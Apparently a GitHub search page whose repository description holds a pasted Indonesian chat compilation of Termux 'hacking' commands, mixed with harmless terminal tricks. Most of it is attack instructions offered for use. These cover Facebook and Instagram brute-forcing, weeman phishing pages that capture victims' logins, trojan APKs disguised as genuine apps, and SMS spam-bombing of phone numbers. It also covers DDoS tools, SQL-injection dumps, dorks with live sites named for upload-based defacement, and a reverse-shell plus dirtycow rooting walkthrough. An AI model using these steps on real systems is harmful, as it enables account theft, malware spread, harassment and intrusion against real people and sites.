Found 93 repositories(showing 30)
Taoviqinvicible
1.[Script Termux] -Cmatrix *apt-get update *apt-get upgrade *apt-get install nmap *apt-get install python *apt-get install list *apt-get install cmatrix *cmatrix [1/11 18.28] +62 821-2770-8489: ✓Mempercantik Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py Hack FB ngincer $ apt update ( Enter ) $ apt upgrade ( Enter ) $ apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd wifi-hacker $ls $chmod +x wifi-hacker.sh $ls $./wifi-hacker.sh ✓ *ni tutor dari gua* TOOL TERMUX LENGKAP ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ Command Termux Hacking...... by:🎭ঔৣஓMuslimCyberSquadঔৣஓீ🎭 ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ cara uninstall tool termux rm -rf toolsnya Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy CHATTING VIA TERMUX irssi /connet irc.freenode.net /nick w3wandroid /join #modol $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam PERKIRAAN cuaca curl http://wttr.in/ (lokasi) Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya Menampilkan animasi kereta :v $ pkg install sl $ sl menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya MEMUTAR MUSIC DI YOUTUBE VIA TERMUX $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dengan mengetik nomornya musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak music CRACK PASSWORD HASH $ git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ $ cd FHX-Hash-Killer $ python2 FHXHashKiller.py $ git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py ASCII ART MAPS - pkg install update && upgrade - pkg install perl - git clone https://github.com/x-xsystm/maps.git - cd maps - perl maps.pl - untuk Zoom tekan A - Password: (pejuang212) CARA MENGHIAS TAMPILAN TERMUX TOXIC TEAM $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ pkg install ncurses-utils $ pkg install ruby $ pkg install lolcat $ pkg install cowsay $ gem install lolcat $ nano .bashrc clear blue='\e[1;34m' green='\e[1;32m' purple='\e[1;35m' cyan='\e[1;36m' red='\e[1;31m' white='\e[1;37m' yellow='\e[1;33m' NOW=`date "+%d.%m.%Y"` TIME=`date "+%H:%M"` cowsay -f eyes **Welcome To TOXIC hacking tool** | lolcat toilet -f standard " **TOXIC** " -F gay neofetch echo " Time : " $TIME | lolcat date | lolcat echo echo Username : Cyber | lolcat echo Hostname : TOXIC | lolcat echo echo @localhost:~# | lolcat echo root@localhost:~$ | lolcat echo -e $green echo root@CYBER:~$ TUTORIAL MEMBUAT VIRUS SEPERTI APLIKASI ASLINYA Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done BOOM SPAM DI TERMUX apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default aja Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (Install *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh LITESPAM $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... Spammer GRAB $pkg install python2 $pip2 install requests $pkg install git $git clone http://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $python2 spammer.py nomor hp korban --delay 30 spam sms jdid 1.PKG install PHP 2.pkg install cURL 3.curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php 4.php jdid.php Hacking spammer by seni $apt update && apt upgrade $apt install python2 php $pip2 install requests $apt install nano $apt install git $git clone https://github.com/Senitopeng/ SpamSms.git $cd SpamSms $python2 mantan.py HACKING DAN TRICK FB VIA TERMUX AUTO BOOT FACEBOOK $ git clone https://github.com/Senitopeng/BotFbBangDjon.git $ cd BotFbBangDjon $ python2 bangdjon.py Cara crack id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction HACKING THOOLS MBF FACEBOOK $ pkg update && upgrade $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/pirmansx/mbf $ cd mbf $ python2 MBF.py (HACKING FB LEWAT TERMUX) $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ dip2 install mechanize $ cd/sterage/emulated/0 $ python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $ storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung BRUTEFORCE $ apt update $ apt upgrade $ apt install python $ apt install pip $ pip install wordlist $ apt install worlist $ Wordlist -h $ cd /sdcard $ Cat pas.txt FACEBOOK BRUTO FORCE $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ pip2 install mechanize $ cd/storage/emulated/0 $ python2 fbbrute.py $ storage/emulated/0/password.txt Hacking tool weeman $ apt-get update $ apt-get upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/evait-security/weeman.git $ ls $ cd weeman $ ls $ python2 weeman.py $ show $set url https://www.facebook.com $set action_url https://www.facebook.com $ show buka new season (new tab) /lembar ke 2 $ ifconfig jika slesai copy no addres yg tertera. jngn sampai salah karna ada 2 addres disitu. jika tdk tau yg mna tanya. stelah copy no adres. buka lembar pertama lagi tulis $ run kasih adres tdi ke target. contoh 125.25.175.88:8080 ingt hrus ksh port > :8080 jika sudah dibuka dngn dia. saat dia login nnti. email. pass. tertera. serta data" akun target.... hacking fbbrute2 by decsec $ apt update (enter) $ apt upgrade (enter) $ apt install python2 (enter) $ apt install wget (enter) $ pip2 install mechanize (enter) $ cd /sdcard (enter) $ mkdir facebrute (enter) $ cd facebrute (enter) $ wget http://override.waper.co/files/facebook.apk $ wget http://override.waper.co/files/password.apk $ mv facebook.apk facebook.py (enter) $ mv password.apk password.txt (enter) $ python2 facebook.py (enter) #Selesai *note: Untuk masalah wordlist bisa buat sendiri kok ^^. Buat sendiri lebih efektif... hacking fbbrute3 $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ Pip2 install urllib3 chardet certifi idna requests( Enter ) $ Apt install openssl curl ( Enter ) $ Pkg install libcurl ( Enter ) $ Ln -s/sdcard ( Enter ) $ cd sdcard ( Enter ) $ Python2 fb.py ( Enter ) Hacking Botkomena fb $pkg update && pkg upgrade $pkg install git $pkg install python2 $pip2 install mechanize $git clone https://github.com/Senitopeng/ Botkomena.git $cd Botkomena $python2 botkomena.py Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py weemen 1.download dulu termux 2.instal termux :V 3.ketik apt install git python2 4.ketik git clone https://github.com/evait-security/weeman.git 5.ketik cd weeman 6.ketik python2 weeman.py kalau udh ke install seperti ini 1.ketik set url https://m.facebook.com 2.ketik set action_url https://m.facebook.com/login 3.ketik run Kalau sudah begini . ketik 127.0.0.1:8080 pada browser maka web pishing yg di buat tadi sudah jadi lalu lemparkan ke target link 127.0.0.1:8080 lalu kalau korban terjebak , di mana email dan password nya ? masuk dalam termux jangan di tutup weeman tidak hanya dapat di gunakan sebagai media pishing facebook saja. kita juga dapat membuat web pishing situs lainya misalnya twitter instagram dll asal memiliki/terdapat form input Hacking instagram $ apt update && apt upgrade -y $ apt install nodejs git $ cd Instagram-Private-Tools $ node index.js $ git clone https://github.com/ccocot/Instagram-Private-Tools.git $ npm install *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* $ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu… $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php *Di google masih banyak kok Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Kalau masih ada yang bin [8/11 06.41] +62 838-5688-2861: TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target 192.168.1.1 set port 8080 set threads 10 masukkan exploitsnya set target 192.168.1.1 -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu… $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` 